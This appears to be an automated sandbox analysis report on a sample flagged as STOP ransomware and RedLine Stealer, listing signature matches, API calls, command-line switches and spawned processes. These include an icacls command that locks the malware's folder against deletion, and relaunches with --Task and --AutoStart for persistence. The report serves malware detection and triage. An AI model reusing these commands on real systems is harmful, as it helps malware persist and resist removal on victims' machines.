        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0000000C.00000002.2413321844.000000000067E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 5000, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 972, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6628, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 3180, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 416, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6408, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1208, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6292, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6956, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1492, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.rans.spre.troj.evad.winEXE@18/733@2/2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_021787C6 CreateToolhelp32Snapshot,Module32First,0_2_021787C6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041F100 EnumTimeFormatsW,DebugActiveProcessStop,EnterCriticalSection,CopyFileExW,IsBadReadPtr,GetConsoleMode,FlushConsoleInputBuffer,LoadResource,GetConsoleOutputCP,AddConsoleAliasW,0_2_0041F100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].json
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: kernel32.dll0_2_0041F450
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: LocalAlloc0_2_0041F450
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --ForNetRes2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Task2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --AutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Service2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: X1P2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: runas2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: x2Q2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: x*P2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: C:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: D:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: 7P2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: %username%2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: F:\2_2_00419F90
        Source: tsnsd8pOvn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: wct425E.tmp.7.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: wct425E.tmp.7.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: wct425E.tmp.7.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: wct425E.tmp.7.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: tsnsd8pOvn.exeReversingLabs: Detection: 86%
        Source: tsnsd8pOvn.exeString found in binary or memory: set-addPolicy
        Source: tsnsd8pOvn.exeString found in binary or memory: id-cmc-addExtensions
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile read: C:\Users\user\Desktop\tsnsd8pOvn.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
        Source: unknownProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
        Source: unknownProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: iphlpapi.dllJump to behavior
